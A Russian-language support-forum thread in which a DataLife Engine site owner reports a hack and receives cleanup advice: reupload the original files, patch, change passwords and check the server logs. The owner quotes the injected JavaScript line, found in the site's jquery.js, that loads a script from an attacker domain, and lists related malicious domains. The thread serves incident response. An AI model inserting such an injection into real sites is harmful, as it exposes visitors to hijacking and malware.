Jump to content
Sign in to follow this  
faraondog

Взломали сайт

Recommended Posts

Здравствуйте, взломали сайт, та же проблема что и здесь: http://zerocoolpro.biz/forum/threads/virus-ili-net-yandex-metrica-ru.12572/

 

Если открыть исходный код и перейти по ссылке:

 

Цитата

<script type="text/javascript" src="/engine/classes/min/index.php?charset=windows-1251&amp;g=general&amp;20"></script>

 

То там левый сайт есть, который подгружается: llveinternet.ru

 

 

Цитата

document.write('<script type="text/javascript" src="http://llveinternet.ru/мойсайтcom?frm=script&se_referrer='+encodeURIComponent(document.referrer)+'"><'+'/script>');

 

Подскажите пожалуйста, как залатать дыру? Как этот код попал сюда /engine/classes/js/jquery.js

 

П.С. Я ставил последние фиксы от дле. Вот он зарегистрировал 6 сайтов: https://ipinfo.io/178.132.0.253 (напишу домены, чтобы нашли в поиске dle-news.su, dle-news.org, yandex-metrica.ru, google-tds.ru, dle-news.biz, llveinternet.ru), которые и будет внедрять!

 

 

 


 

 

Edited by faraondog

Share this post


Link to post
Share on other sites
10 часов назад, faraondog сказал:

Подскажите пожалуйста, как залатать дыру? Как этот код попал сюда /engine/classes/js/jquery.js

 

П.С. Я ставил последние фиксы от дле. Вот он зарегистрировал 6 сайтов: https://ipinfo.io/178.132.0.253 (напишу домены, чтобы нашли в поиске dle-news.su, dle-news.org, yandex-metrica.ru, google-tds.ru, dle-news.biz, llveinternet.ru), которые и будет внедрять!

У вас взломали ваш сервер, а не DLE, т.к. даже имя полный контроль над DLE этот файл через него не изменить. DLE это не редактор файлов. У вас либо есть шелл на сервере, либо был украден доступ к вашему серверу.

 

Для удаления шеллов на сервере со стороны DLE нужно сделать следующее:

1. Полностью перезалить все файлы скрипта на сервере на оригинальные из архива дистрибутива.
2. При наличии устаревших версий скрипта, проверить и убедится что установлены все патчи безопасности http://dle-news.ru/bags/
3. Проверить наличие постороннего или подозрительного кода в файлах в папке /engine/data/
4. После этого необходимо запустить антивирус в админпанели скрипта и удалить все на что он укажет без исключения.
5. Если на вашем аккаунте на сервере несколько сайтов, то проделать вышеуказанные действия для всех сайтов без исключения.
6. Изменить все пароли, как к хостингу, так и к DLE.
7. Удалить в админпанели всех администраторов кроме себя.
8. Никакие сторонние модули и модификации не ставить. Если использовались сторонние модули, то удалить их все без исключения.

Со стороны сервера:

Полностью обновить все серверное ПО и сменить все без исключения пароли. Изучение логов сервера, на предмет кто с каких IP заходил на шелл на сервере, что делал до этого на сервере и куда заходил. Какая активность была перед появлением шелла на сервере в принципе.

Со стороны своего компьютера:
Полностью проверить антивирусом с актуальными базами, не использовать ПО скачанное с неизвестных источников, только оригинальное актуальных версий.

Share this post


Link to post
Share on other sites

Здравствуйте, понял. Спасибо за ответ. Это скорее всего моя вина, так как "использовал ПО скачанное с неизвестных источников", а после покупки дле так и не обновил файлы!

Share this post


Link to post
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

Sign in to follow this  

×
×
  • Create New...